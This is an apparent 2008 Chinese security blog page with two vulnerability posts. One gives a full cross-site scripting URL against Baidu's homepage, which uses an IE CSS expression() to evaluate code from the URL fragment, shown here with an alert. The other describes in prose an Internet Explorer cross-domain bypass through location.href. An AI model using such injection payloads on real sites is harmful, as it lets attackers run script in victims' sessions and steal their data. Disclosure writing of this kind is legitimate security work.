注册 | 登录 | 首页 | 归档 | 搜索 | 标签 | 评论
技术(24) | 软件(24) | 咨讯(80) | 浏览模式: 标准 | 列表 Tag: bug

百度主页又可以XX

Posted by admin on 2008-07-06, 10:22 AM

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28136396000%29

f52b8987905d583fc65cc398.jpg 大小: 35.33 K 尺寸: 350 x 221 浏览: 22 次 点击打开新窗口浏览全图

Tags: 百度, 主页, xss, 漏洞, bug

咨讯 | 评论:0 | 阅读:235

Microsoft IE location及location.href绕过跨域安全限制漏洞

Posted by admin on 2008-07-02, 7:07 PM

ie没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。

» 阅读全文

Tags: ie, 漏洞, bug, 微软

技术 | 评论:0 | 阅读:112